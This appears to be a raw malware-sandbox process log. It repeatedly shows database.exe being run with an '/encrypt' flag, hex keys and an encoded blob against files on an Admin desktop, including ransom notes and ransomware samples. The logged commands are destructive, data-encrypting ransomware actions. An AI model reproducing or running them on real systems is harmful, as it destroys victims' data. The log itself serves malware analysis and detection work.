C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\RevokeHide.vsx.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:7896
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\ShowPush.jpg.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:7904
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\ShowSync.rle.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:7912
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\StartRemove.mpeg3.sage.gif"5⤵PID:6804
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\sWiVkIcd-unycY7aQ.[[email protected]].gif"5⤵PID:7928
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\TestUndo.ppt.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:7940
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\TUKJxPJj-ELwXopms.[[email protected]].gif"5⤵PID:7936
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\UnblockRestore.jtx.sage.gif"5⤵PID:7948
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\uWPwQFnd-mjxwmm85.[[email protected]].gif"5⤵PID:7956
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\WriteResolve.dib.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:7964
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\WZos2rLV-wyxty8Lk.[[email protected]].gif"5⤵PID:7972
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\[HOW_TO_DECRYPT_FILES].html"5⤵PID:7980
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\2aua0mwa.exe"5⤵PID:7988
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\HEUR-Trojan-Ransom.MSIL.Blocker.gen-57c4578f5aeecf623987474b555093aef07bed73797aca041afd31e0e67351ef.gif"5⤵PID:8000
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\HEUR-Trojan-Ransom.MSIL.Crypmod.gen-d5086f660b09c07006a213469edbb78549596e9231953993cc7ab43f14a1caec.gif"5⤵PID:8008
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\HEUR-Trojan-Ransom.MSIL.Encoder.gen-26750ee4c44e015354e290cf0f064a52340e623fc5df8986d9c4c3dce62cd066.gif"5⤵PID:7044
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\HEUR-Trojan-Ransom.Win32.Agent.gen-c258088499ef0bcd93fa23f726bef802a11fe8aa03b95262f827e0a7c01aa2c5.gif"5⤵PID:8036
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\HEUR-Trojan-Ransom.Win32.Blocker.gen-bd8d1fb9b2ffb5690b84e32e5d6c794d42ec4ec753222478092776ea1e483991.gif"5⤵PID:8028
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\HEUR-Trojan-Ransom.Win32.Generic-8a57e361887aca6d776de1c2cc8f1f30cfddd2cf882726fab12084f06bda0c1a.gif"5⤵PID:8020
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\KEYIDS.KLST.gif"5⤵PID:8044
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Restore-My-Files.txt"5⤵PID:8052
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.MSIL.Agent.fqnw-d1afbbebb8c29d49b2bec1b5e01cec2d786dc36ede052c35b61978fe3dca1102.gif"5⤵PID:8068
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.fpnf-bc26d4efe4a5f638a12e88f589d0097e67d71c73273fedd2ede0dfe4a41c39df.gif"5⤵PID:8072
-
-
